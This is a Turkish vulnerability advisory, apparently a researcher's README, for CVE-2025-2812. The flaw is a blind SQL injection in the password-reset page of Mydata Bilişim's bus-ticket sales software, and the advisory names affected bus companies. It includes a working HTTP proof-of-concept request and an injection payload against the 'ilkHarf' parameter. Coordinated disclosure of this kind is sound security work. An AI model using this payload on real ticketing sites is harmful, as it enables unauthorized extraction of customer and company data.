
# CVE-2025-2812 — SQL Injection Vulnerability in "Bilet Satış Otomasyonu" by Mydata Bilişim Ltd. Şti

> 📌 **CVE-ID:** [CVE-2025-2812](https://www.cve.org/cverecord?id=CVE-2025-2812)  
> 📢 **USOM Duyurusu:** [tr-25-0099](https://www.usom.gov.tr/bildirim/tr-25-0099)  
> 🛡️ **Zafiyet Tipi:** CWE-89 - SQL Injection (Boolean-based Blind)  
> 🏢 **Etkilenen Ürün:** Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti  
> 🌐 **Örnek Hedef URL:** `https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php`  

---

## 🔍 Zafiyet Özeti

"Bilet Satış Otomasyonu" ürününde, şifre sıfırlama (SifremiUnuttum.php) sayfasındaki `"Adınızın ilk harfi"` (ilkHarf) parametresinde **Boolean-based Blind SQL Injection** zafiyeti tespit edilmiştir. Bu zafiyet, kullanıcı adı ya da parola olmadan sistemden veri sızdırılmasına imkân tanımaktadır.

Bu zafiyet, aşağıdaki otobüs firmalarının sistemlerini kapsıyor:
- Balıkesir Uludağ
- Kontur
- Efe Tur
- Kale Seyahat
- +20 firma
---

## 💥 PoC (Proof of Concept)

### 📌 HTTP Request:

```http
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
````

### 🧪 Kullanılan Payload:

```text
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
```

---

## 🧠 Teknik Detaylar

* **Zafiyetli Parametre:** `ilkHarf`
* **Yöntem:** Boolean-based Blind SQLi
* **Zafiyet Türü:** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

---

## 🙏 Teşekkür

"Mydata Bilişim Ltd. Şti" tarafından geliştirilen "Bilet Satış Otomasyonu" ürününde tespit ettiğimiz zafiyet sonrası, CVE-2025-2812 koduyla duyurulan bu açık, üretici ve [USOM](https://www.usom.gov.tr) koordinasyonuyla ilan edilmiştir.
Bu süreçte siber güvenlik topluluğuna katkı sunmaktan gurur duyarız.

Zafiyetin bildirilmesini takiben, Mydata Bilişim Ltd. Şti gerekli tüm prosedürleri hızlıca uygulamış, ilgili güvenlik açığını kapatarak sistemlerine ek güvenlik önlemleri entegre etmiştir. Sürece gösterdikleri şeffaflık, iş birliği ve sorumluluk bilinci için kendilerine teşekkür ederiz.

Bu süreçte siber güvenlik topluluğuna katkı sunmaktan gurur duyarız.

---

## 📬 İletişim

Her türlü soru, geri bildirim ya da iş birliği için benimle iletişime geçebilirsiniz:

- 📧 E-posta: [hasanyasinyasar@gmail.com](mailto:hasanyasinyasar@gmail.com)  
- 📷 Instagram: [@yyasar.yasin](https://www.instagram.com/yyasar.yasin)

---
